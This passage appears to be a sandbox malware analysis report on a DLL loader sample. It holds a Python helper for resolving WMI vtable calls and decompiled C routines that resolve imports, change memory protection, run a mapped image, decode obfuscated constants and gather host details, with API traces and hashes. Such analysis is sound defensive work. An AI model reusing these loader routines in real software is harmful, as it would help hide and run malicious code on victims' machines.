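IUNKNOWN = [("QueryInterface", 2), ("AddRef", 0), ("Release", 0)]

IWBEM_CLASS_OBJECT = IUNKNOWN + [
    ("GetQualifierSet", 1), ("Get", 5), ("Put", 4), ("Delete", 1),
    ("GetNames", 4), ("BeginEnumeration", 1), ("Next", 5), ("EndEnumeration", 0),
    ("GetPropertyQualifierSet", 2), ("Clone", 1), ("GetObjectText", 2),
    ("SpawnDerivedClass", 2), ("SpawnInstance", 2), ("CompareTo", 2),
    ("GetPropertyOrigin", 2), ("InheritsFrom", 1), ("GetMethod", 4),
    ("PutMethod", 4), ("DeleteMethod", 1), ("BeginMethodEnumeration", 1),
    ("NextMethod", 4), ("EndMethodEnumeration", 0), ("GetMethodQualifierSet", 2),
    ("GetMethodOrigin", 2),
]

IWBEM_SERVICES = IUNKNOWN + [
    ("OpenNamespace", 5), ("CancelAsyncCall", 1), ("QueryObjectSink", 2),
    ("GetObject", 5), ("GetObjectAsync", 4), ("PutClass", 4), ("PutClassAsync", 4),
    ("DeleteClass", 4), ("DeleteClassAsync", 4), ("CreateClassEnum", 4),
    ("CreateClassEnumAsync", 4), ("PutInstance", 4), ("PutInstanceAsync", 4),
    ("DeleteInstance", 4), ("DeleteInstanceAsync", 4), ("CreateInstanceEnum", 4),
    ("CreateInstanceEnumAsync", 4), ("ExecQuery", 5), ("ExecQueryAsync", 5),
    ("ExecNotificationQuery", 5), ("ExecNotificationQueryAsync", 5),
    ("ExecMethod", 7), ("ExecMethodAsync", 6),
]

INTERFACES = {"IWbemClassObject": IWBEM_CLASS_OBJECT, "IWbemServices": IWBEM_SERVICES}


def resolve(offset, nargs, ptr_size=4, interfaces=INTERFACES):
    """Return 'Interface::Method' for every known interface whose slot at `offset`
    takes exactly `nargs` arguments after `this`. IUnknown slots are reported once."""
    if offset % ptr_size:
        raise ValueError("vtable offset %#x is not pointer aligned" % offset)
    slot = offset // ptr_size
    if slot < len(IUNKNOWN):
        name, arity = IUNKNOWN[slot]
        return ["IUnknown::%s" % name] if arity == nargs else []
    return ["%s::%s" % (iface, table[slot][0])
            for iface, table in interfaces.items()
            if slot < len(table) and table[slot][1] == nargs]


# The indirect calls in E00EC9152 as the decompiler shows them:
# (receiver expression, vtable offset, arguments after `this`).
E00EC9152_CALLS = [
    ("*(_a4 + 4)", 0x4c, 4),   # (_t35, _a16, 0, &_v8, 0)
    ("_v8",        0x14, 4),   # (_t52, _a24, 0, _t61, 0)
    ("*_a4",       0x60, 7),   # (_t43, _t20, _a16, 0, 0, _v8, &_a4, 0)
    ("_a4 (out)",  0x10, 5),   # (_t50, _a24, 0, _t65, 0, 0)
    ("_a4 (out)",  0x08, 0),   # (_t45)
    ("_v8",        0x08, 0),   # (_t41)
]


def annotate(calls=E00EC9152_CALLS):
    """Resolve each call site. A site with more than one candidate cannot be
    settled by offset and arity alone and needs the surrounding data flow."""
    return [(recv, off, resolve(off, n)) for recv, off, n in calls]


if __name__ == "__main__":
    for recv, off, names in annotate():
        print("%-12s +%#04x -> %s" % (recv, off, ", ".join(names) or "?"))
```

Only the first site is ambiguous: slot 0x4c with four arguments is both IWbemClassObject::GetMethod and IWbemServices::CreateInstanceEnumAsync. The data flow settles it: the object written through &_v8 is next called through slot 0x14 with four arguments, which only IWbemClassObject::Put has, so the first receiver is a class object and the sequence reads GetMethod, Put on the in-parameters, IWbemServices::ExecMethod, Get on the out-parameters, Release. That is the documented way to invoke a WMI provider method from native code; which provider is invoked is not recoverable from this listing, since only the "St" prefix of the object path string at +0xece1fc is visible.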

                                                  C-Code - Quality: 100%
                                                   			// Thread routine of the code in the private region at 0x400000 (it ends in ExitThread and
                                                   			// never returns). Comments are editorial annotations of the visible constants, not
                                                   			// decompiler output; _t39 and _t44 are left undefined by the decompiler.
                                                   			E0040135A() {
                                                   				char _v16;
                                                   				intOrPtr _v28;
                                                   				void _v32;
                                                   				void* _v36;
                                                   				intOrPtr _t15;
                                                   				void* _t16;
                                                   				long _t25;
                                                   				int _t26;
                                                   				void* _t30;
                                                   				intOrPtr* _t32;
                                                   				signed int _t36;
                                                   				intOrPtr _t39;
                                                   
                                                   				// Select one of two table strings (base *0x404150 plus offset) depending on whether the
                                                   				// global at 0x40412c exceeds 5.
                                                   				_t15 =  *0x404150;
                                                   				if( *0x40412c > 5) {
                                                   					_t16 = _t15 + 0x4050f9;
                                                   				} else {
                                                   					_t16 = _t15 + 0x4050b1;
                                                   				}
                                                   				E00401FE7(_t16, _t16);
                                                   				_t36 = 6;
                                                   				memset( &_v32, 0, _t36 << 2); // zero six dwords
                                                   				// The third argument is a stored dword XOR-ed with a constant, i.e. an inline decoding of an obfuscated value.
                                                   				if(E00401414( &_v32,  &_v16,  *0x40414c ^ 0xfd7cd1cf) == 0) {
                                                   					_t25 = 0xb; // exit code 11 on failure
                                                   				} else {
                                                   					_t26 = lstrlenW( *0x404138);
                                                   					_t8 = _t26 + 2; // 0x2
                                                   					// 2*len + 10 bytes: a dword at offset 0 followed by the string as UTF-16 at offset 4.
                                                   					_t11 = _t26 + _t8 + 8; // 0xa
                                                   					_t30 = E0040102F(_t39, _t11,  &_v32,  &_v36); // executed
                                                   					if(_t30 == 0) {
                                                   						_t32 = _v36;
                                                   						 *_t32 = 0;
                                                   						if( *0x404138 == 0) {
                                                   							 *((short*)(_t32 + 4)) = 0; // empty string
                                                   						} else {
                                                   							E0040200D(_t44, _t32 + 4); // copy the string at offset 4
                                                   						}
                                                   					}
                                                   					_t25 = E00401E11(_v28); // executed
                                                   				}
                                                   				ExitThread(_t25);
                                                   			}

                                                   Statement addresses for E0040135A (listed in the order of the C statements above):
                                                   0x00401360, 0x00401371, 0x0040137b, 0x00401373, 0x00401373, 0x00401373, 0x00401382, 0x0040138b, 0x00401390, 0x004013ae,
                                                   0x00401405, 0x004013b0, 0x004013b6, 0x004013bc, 0x004013ca, 0x004013ce, 0x004013d5, 0x004013d7, 0x004013e3, 0x004013e5,
                                                   0x004013f4, 0x004013e7, 0x004013ed, 0x004013ed, 0x004013e5, 0x004013fc, 0x004013fc, 0x00401407

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitThreadlstrlen
                                                  • String ID:
                                                  • API String ID: 2636182767-0
                                                  • Opcode ID: d0f5276c7d2ce7e0a5e41471ba7a2c6755e937518a4a13e4d3d01d1591e5aeb6
                                                  • Instruction ID: 89559214658415b618ba5696c5fb43bb06a1630c8a8f3c3b56ffde9c1baf62f0
                                                  • Opcode Fuzzy Hash: d0f5276c7d2ce7e0a5e41471ba7a2c6755e937518a4a13e4d3d01d1591e5aeb6
                                                  • Instruction Fuzzy Hash: C711BB71408205AFE711EBA5CD48D9B77ECEB48304F01083AB645FB1B1E734E5458B9A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SysAllocString.OLEAUT32(00EC8B1E), ref: 00EC1A1D
                                                    • Part of subcall function 00EC9152: SysFreeString.OLEAUT32(?), ref: 00EC9231
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00EC1A5D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: String$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 986138563-0
                                                  • Opcode ID: 79f16543701ff521e4cf2ae542eb7ef777d999a84c30e8af1ebef881bd1dc54c
                                                  • Instruction ID: ba5c5748012c9819af4d69cf2f60bd39d23488d5f1f78bf25959d9b1bea8a17f
                                                  • Opcode Fuzzy Hash: 79f16543701ff521e4cf2ae542eb7ef777d999a84c30e8af1ebef881bd1dc54c
                                                  • Instruction Fuzzy Hash: E601A27250110ABFCB109FA9CD09D9F7BB8FF48350B114065FA09F2220D3319A1ACBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 37%
                                                  			E00EC54BC(void* __ecx) {
                                                  				signed int _v8;
                                                  				void* _t15;
                                                  				void* _t19;
                                                  				void* _t20;
                                                  				void* _t22;
                                                  				intOrPtr* _t23;
                                                  
                                                  				_t23 = __imp__;
                                                  				_t20 = 0;
                                                  				_v8 = _v8 & 0;
                                                  				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                                  				_t10 = _v8;
                                                  				if(_v8 != 0) {
                                                  					_t20 = E00EC2049(_t10 + 1);
                                                  					if(_t20 != 0) {
                                                  						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                                  						if(_t15 != 0) {
                                                  							 *((char*)(_v8 + _t20)) = 0;
                                                  						} else {
                                                  							E00EC9039(_t20);
                                                  							_t20 = 0;
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t20;
                                                  			}
                                                  0x00ec54c1
                                                  0x00ec54cc
                                                  0x00ec54ce
                                                  0x00ec54d4
                                                  0x00ec54d6
                                                  0x00ec54db
                                                  0x00ec54e4
                                                  0x00ec54e8
                                                  0x00ec54f1
                                                  0x00ec54f5
                                                  0x00ec5504
                                                  0x00ec54f7
                                                  0x00ec54f8
                                                  0x00ec54fd
                                                  0x00ec54fd
                                                  0x00ec54f5
                                                  0x00ec54e8
                                                  0x00ec550d

                                                  APIs
                                                  • GetComputerNameExA.KERNELBASE(00000003,00000000,00ECA306,7519F710,00000000,?,?,00ECA306), ref: 00EC54D4
                                                    • Part of subcall function 00EC2049: RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
                                                  • GetComputerNameExA.KERNELBASE(00000003,00000000,00ECA306,00ECA307,?,?,00ECA306), ref: 00EC54F1
                                                    • Part of subcall function 00EC9039: HeapFree.KERNEL32(00000000,00000000,00EC7F18,00000000,?,?,00000000), ref: 00EC9045
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: ComputerHeapName$AllocateFree
                                                  • String ID:
                                                  • API String ID: 187446995-0
                                                  • Opcode ID: 941b35559f24209fef2c0652ce93e34530d7ade8e90fa06476922e92e2e779ac
                                                  • Instruction ID: c5fd5468858ab30c3575b4f2d0f0a3f5e55862e06a5b41874f1651c31bc0e9c9
                                                  • Opcode Fuzzy Hash: 941b35559f24209fef2c0652ce93e34530d7ade8e90fa06476922e92e2e779ac
                                                  • Instruction Fuzzy Hash: 74F0B423600609FAEB10D69A8E01FAF36EDDBC1744F20006DA914F3100EA72EE038770
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                  				intOrPtr _t4;
                                                  				void* _t10;
                                                  				void* _t11;
                                                  				void* _t12;
                                                  				void* _t14;
                                                  
                                                  				_t14 = 1;
                                                  				_t4 = _a8;
                                                  				if(_t4 == 0) {
                                                  					if(InterlockedDecrement(0xecd23c) == 0) {
                                                  						E00EC970F();
                                                  					}
                                                  				} else {
                                                  					if(_t4 == 1 && InterlockedIncrement(0xecd23c) == 1) {
                                                  						_t10 = E00EC6A56(_t11, _t12, _a4); // executed
                                                  						if(_t10 != 0) {
                                                  							_t14 = 0;
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t14;
                                                  			}
                                                  0x00ec805c
                                                  0x00ec805d
                                                  0x00ec8060
                                                  0x00ec8092
                                                  0x00ec8094
                                                  0x00ec8094
                                                  0x00ec8062
                                                  0x00ec8063
                                                  0x00ec8078
                                                  0x00ec807f
                                                  0x00ec8081
                                                  0x00ec8081
                                                  0x00ec807f
                                                  0x00ec8063
                                                  0x00ec809c

                                                  APIs
                                                  • InterlockedIncrement.KERNEL32(00ECD23C), ref: 00EC806A
                                                    • Part of subcall function 00EC6A56: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00EC807D,?), ref: 00EC6A69
                                                  • InterlockedDecrement.KERNEL32(00ECD23C), ref: 00EC808A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: Interlocked$CreateDecrementHeapIncrement
                                                  • String ID:
                                                  • API String ID: 3834848776-0
                                                  • Opcode ID: 703dbc3b27b01410a69634f12a27d188b74c7b59327d30b7f6e1c69fcda74e18
                                                  • Instruction ID: 176791e3be4566420ebf90ecc376d4fa340e2de72b9c2401ba63c95720395162
                                                  • Opcode Fuzzy Hash: 703dbc3b27b01410a69634f12a27d188b74c7b59327d30b7f6e1c69fcda74e18
                                                  • Instruction Fuzzy Hash: A2E02634244B2197A2302B708F0BF5EA644AF10B88F04702CF688F00B0CE13DC4BC6D1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 34%
                                                  			E00EC9318(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                  				intOrPtr _v12;
                                                  				void* _v18;
                                                  				short _v20;
                                                  				intOrPtr _t15;
                                                  				short _t17;
                                                  				intOrPtr _t19;
                                                  				short _t23;
                                                  
                                                  				_t23 = 0;
                                                  				_v20 = 0;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosw");
                                                  				_t15 =  *0xecd27c; // 0x213a5a8
                                                  				_t4 = _t15 + 0xece39c; // 0x3008944
                                                  				_t20 = _t4;
                                                  				_t6 = _t15 + 0xece124; // 0x650047
                                                  				_t17 = E00EC9152(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                                  				if(_t17 < 0) {
                                                  					_t23 = _t17;
                                                  				} else {
                                                  					if(_v20 != 8) {
                                                  						_t23 = 1;
                                                  					} else {
                                                  						_t19 = E00EC9FC9(_t20, _v12);
                                                  						if(_t19 == 0) {
                                                  							_t23 = 8;
                                                  						} else {
                                                  							 *_a16 = _t19;
                                                  						}
                                                  						__imp__#6(_v12);
                                                  					}
                                                  				}
                                                  				return _t23;
                                                  			}
                                                  0x00ec9322
                                                  0x00ec9324
                                                  0x00ec932b
                                                  0x00ec932c
                                                  0x00ec932d
                                                  0x00ec932e
                                                  0x00ec9334
                                                  0x00ec9339
                                                  0x00ec9339
                                                  0x00ec9343
                                                  0x00ec9355
                                                  0x00ec935c
                                                  0x00ec938b
                                                  0x00ec935e
                                                  0x00ec9363
                                                  0x00ec9388
                                                  0x00ec9365
                                                  0x00ec9368
                                                  0x00ec936f
                                                  0x00ec937a
                                                  0x00ec9371
                                                  0x00ec9374
                                                  0x00ec9374
                                                  0x00ec937e
                                                  0x00ec937e
                                                  0x00ec9363
                                                  0x00ec9392

                                                  APIs
                                                    • Part of subcall function 00EC9152: SysFreeString.OLEAUT32(?), ref: 00EC9231
                                                    • Part of subcall function 00EC9FC9: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00EC7946,004F0053,00000000,?), ref: 00EC9FD2
                                                    • Part of subcall function 00EC9FC9: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00EC7946,004F0053,00000000,?), ref: 00EC9FFC
                                                    • Part of subcall function 00EC9FC9: memset.NTDLL ref: 00ECA010
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00EC937E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: FreeString$lstrlenmemcpymemset
                                                  • String ID:
                                                  • API String ID: 397948122-0
                                                  • Opcode ID: b5c78854177dec2ddab688448453b21a89f0ea69e108811ef49c0aff2a759f71
                                                  • Instruction ID: a22b463627bf8c6d67ce2f14a35867d1b9d0572289473d0d8598e6cccd3ee264
                                                  • Opcode Fuzzy Hash: b5c78854177dec2ddab688448453b21a89f0ea69e108811ef49c0aff2a759f71
                                                  • Instruction Fuzzy Hash: 4901B132500159BFCF119FA8CD09EAEBBB8FB44710F11586AE911F21A2D3729956C791
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 37%
                                                  			E00401FE7(void* __eax, intOrPtr _a4) {
                                                  
                                                  				 *0x404148 =  *0x404148 & 0x00000000;
                                                  				_push(0);
                                                  				_push(0x404144);
                                                  				_push(1);
                                                  				_push(_a4);
                                                  				 *0x404140 = 0xc; // executed
                                                  				L00401BD6(); // executed
                                                  				return __eax;
                                                  			}
                                                  0x00401fe7
                                                  0x00401fee
                                                  0x00401ff0
                                                  0x00401ff5
                                                  0x00401ff7
                                                  0x00401ffb
                                                  0x00402005
                                                  0x0040200a

                                                  APIs
                                                  • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401387,00000001,00404144,00000000), ref: 00402005
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DescriptorSecurity$ConvertString
                                                  • String ID:
                                                  • API String ID: 3907675253-0
                                                  • Opcode ID: 9b2c487b67a07d99fdd9699fa098756d513cf92635e2e3c07589c75f82ff200c
                                                  • Instruction ID: 64a343feecbe3ef0b73f5dc68f4200e7203235e6a0c8b6df44520468a7cd6f76
                                                  • Opcode Fuzzy Hash: 9b2c487b67a07d99fdd9699fa098756d513cf92635e2e3c07589c75f82ff200c
                                                  • Instruction Fuzzy Hash: C0C04CF4140300A7E6209F019D4AF05766177E4709F204529F3003A1E093F91094851D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00EC2049(long _a4) {
                                                  				void* _t2;
                                                  
                                                  				_t2 = RtlAllocateHeap( *0xecd238, 0, _a4); // executed
                                                  				return _t2;
                                                  			}
                                                  0x00ec2055
                                                  0x00ec205b

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,00000000,00EC7E50), ref: 00EC2055
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.647362848.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.647333760.0000000000EC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647432081.0000000000ECC000.00000002.00020000.sdmp
• Associated: 00000000.00000002.647480156.0000000000ECD000.00000004.00020000.sdmp
• Associated: 00000000.00000002.647542838.0000000000ECF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_ec0000_loaddll32.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: bd2f601f70961682bf16b033b36b6eaef32cc40adb831099aeb6cc8b0f511113
                                                  • Instruction ID: af37340a7dc6eaa1afdba61c6f02500b8e99072d2aa6aab8e222df9e985c90bc
                                                  • Opcode Fuzzy Hash: bd2f601f70961682bf16b033b36b6eaef32cc40adb831099aeb6cc8b0f511113
                                                  • Instruction Fuzzy Hash: 5DB01236404100EFCA014B01DD05F05FB21FB54700F104130F20864070C333846AEB05
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 86%
                                                  			E00401E11(void* __eax) {
                                                  				char _v8;
                                                  				void* _v12;
                                                  				void* __edi;
                                                  				void* _t18;
                                                  				long _t24;
                                                  				long _t26;
                                                  				long _t29;
                                                  				intOrPtr _t40;
                                                  				void* _t41;
                                                  				intOrPtr* _t42;
                                                  				void* _t44;
                                                  
                                                  				_t41 = __eax;
                                                  				_t16 =  *0x40414c;
                                                  				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x40414c - 0x63698bc4 &  !( *0x40414c - 0x63698bc4);
                                                  				_t18 = E00401A0F( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x40414c - 0x63698bc4 &  !( *0x40414c - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x40414c - 0x63698bc4 &  !( *0x40414c - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
                                                  				if(_t18 != 0) {
                                                  					_t29 = 8;
                                                  					goto L8;
                                                  				} else {
                                                  					_t40 = _v8;
                                                  					_t29 = E0040125B(_t33, _t40, _t41);
                                                  					if(_t29 == 0) {
                                                  						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                                                  						_t24 = E00401745(_t40, _t44); // executed
                                                  						_t29 = _t24;
                                                  						if(_t29 == 0) {
                                                  							_t26 = E00401179(_t44, _t40); // executed
                                                  							_t29 = _t26;
                                                  							if(_t29 == 0) {
                                                  								_push(_t26);
                                                  								_push(1);
                                                  								_push(_t40);
                                                  								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                                                  									_t29 = GetLastError();
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  					_t42 = _v12;
                                                  					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                                                  					E00401DFC(_t42);
                                                  					L8:
                                                  					return _t29;
                                                  				}
                                                  			}
                                                  0x00401e19
                                                  0x00401e1b
                                                  0x00401e37
                                                  0x00401e48
                                                  0x00401e4f
                                                  0x00401ead
                                                  0x00000000
                                                  0x00401e51
                                                  0x00401e51
                                                  0x00401e5b
                                                  0x00401e5f
                                                  0x00401e64
                                                  0x00401e67
                                                  0x00401e6c
                                                  0x00401e70
                                                  0x00401e75
                                                  0x00401e7a
                                                  0x00401e7e
                                                  0x00401e83
                                                  0x00401e84
                                                  0x00401e88
                                                  0x00401e8d
                                                  0x00401e95
                                                  0x00401e95
                                                  0x00401e8d
                                                  0x00401e7e
                                                  0x00401e70
                                                  0x00401e97
                                                  0x00401ea0
                                                  0x00401ea4
                                                  0x00401eae
                                                  0x00401eb4
                                                  0x00401eb4

                                                  APIs
                                                    • Part of subcall function 00401A0F: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401E4D,?,?,?,?,?,00000002,?,00401401), ref: 00401A33
                                                    • Part of subcall function 00401A0F: GetProcAddress.KERNEL32(00000000,?), ref: 00401A55
                                                    • Part of subcall function 00401A0F: GetProcAddress.KERNEL32(00000000,?), ref: 00401A6B
                                                    • Part of subcall function 00401A0F: GetProcAddress.KERNEL32(00000000,?), ref: 00401A81
                                                    • Part of subcall function 00401A0F: GetProcAddress.KERNEL32(00000000,?), ref: 00401A97
                                                    • Part of subcall function 00401A0F: GetProcAddress.KERNEL32(00000000,?), ref: 00401AAD
                                                    • Part of subcall function 0040125B: memcpy.NTDLL(?,?,?), ref: 00401288
                                                    • Part of subcall function 0040125B: memcpy.NTDLL(?,?,?), ref: 004012BB
                                                    • Part of subcall function 00401745: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 0040177D
                                                    • Part of subcall function 00401179: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 004011B2
                                                    • Part of subcall function 00401179: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 00401227
                                                    • Part of subcall function 00401179: GetLastError.KERNEL32 ref: 0040122D
                                                  • GetLastError.KERNEL32(?,00401401), ref: 00401E8F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.644892830.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.644956841.0000000000405000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                  • String ID:
                                                  • API String ID: 2673762927-0
                                                  • Opcode ID: ac1c15eea1d471ab0512bfeefaa7e6246061eff03e495dd0c18f64ef0ca3e3c7
                                                  • Instruction ID: 7a28e5235208ce399f98616bf791f331da11f6e25b936d66cc8c9f92ca0095d4
                                                  • Opcode Fuzzy Hash: ac1c15eea1d471ab0512bfeefaa7e6246061eff03e495dd0c18f64ef0ca3e3c7
                                                  • Instruction Fuzzy Hash: 3111CB76600705ABD721ABA5CC80DAF77BCAF89318704417AED01B76A1E7B4ED0687E4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 70%
                                                  			E00EC21CD(void* __ecx, signed char* _a4) {
                                                  				void* _v8;
                                                  				void* _t8;
                                                  				signed short _t11;
                                                  				signed int _t12;
                                                  				signed int _t14;
                                                  				intOrPtr _t15;
                                                  				void* _t19;
                                                  				signed short* _t22;
                                                  				void* _t24;
                                                  				intOrPtr* _t27;
                                                  
                                                  				_t24 = 0;
                                                  				_push(0);
                                                  				_t19 = 1;
                                                  				_t27 = 0xecd330;
                                                  				E00EC84D5();
                                                  				while(1) {
                                                  					_t8 = E00EC12D4(_a4,  &_v8); // executed
                                                  					if(_t8 == 0) {
                                                  						break;
                                                  					}
                                                  					_push(_v8);
                                                  					_t14 = 0xd;
                                                  					_t15 = E00EC809F(_t14);
                                                  					if(_t15 == 0) {
                                                  						HeapFree( *0xecd238, 0, _v8);
                                                  						break;
                                                  					} else {
                                                  						 *_t27 = _t15;
                                                  						_t27 = _t27 + 4;
                                                  						_t24 = _t24 + 1;
                                                  						if(_t24 < 3) {
                                                  							continue;
                                                  						} else {
                                                  						}
                                                  					}
                                                  					L7:
                                                  					_push(1);
                                                  					E00EC84D5();
                                                  					if(_t19 != 0) {
                                                  						_t22 =  *0xecd338; // 0x3009b70
                                                  						_t11 =  *_t22 & 0x0000ffff;
                                                  						if(_t11 < 0x61 || _t11 > 0x7a) {
                                                  							_t12 = _t11 & 0x0000ffff;
                                                  						} else {
                                                  							_t12 = (_t11 & 0x0000ffff) - 0x20;
                                                  						}
                                                  						 *_t22 = _t12;
                                                  					}
                                                  					return _t19;
                                                  				}
                                                  				_t19 = 0;
                                                  				goto L7;
			}

                                                  APIs
                                                    • Part of subcall function 00EC84D5: GetProcAddress.KERNEL32(36776F57,00EC21E5), ref: 00EC84F0
                                                    • Part of subcall function 00EC12D4: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 00EC12FF
                                                    • Part of subcall function 00EC12D4: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00EC1321
                                                    • Part of subcall function 00EC12D4: memset.NTDLL ref: 00EC133B
                                                    • Part of subcall function 00EC12D4: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00EC1379
                                                    • Part of subcall function 00EC12D4: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00EC138D
                                                    • Part of subcall function 00EC12D4: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00EC13A4
                                                    • Part of subcall function 00EC12D4: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00EC13B0
                                                    • Part of subcall function 00EC12D4: lstrcat.KERNEL32(?,642E2A5C), ref: 00EC13F1
                                                    • Part of subcall function 00EC12D4: FindFirstFileA.KERNELBASE(?,?), ref: 00EC1407
                                                    • Part of subcall function 00EC809F: lstrlen.KERNEL32(?,00000000,00ECD330,00000001,00EC2200,00ECD00C,00ECD00C,00000000,00000005,00000000,00000000,?,?,?,00EC96C1,#), ref: 00EC80A8
                                                    • Part of subcall function 00EC809F: mbstowcs.NTDLL ref: 00EC80CF
                                                    • Part of subcall function 00EC809F: memset.NTDLL ref: 00EC80E1
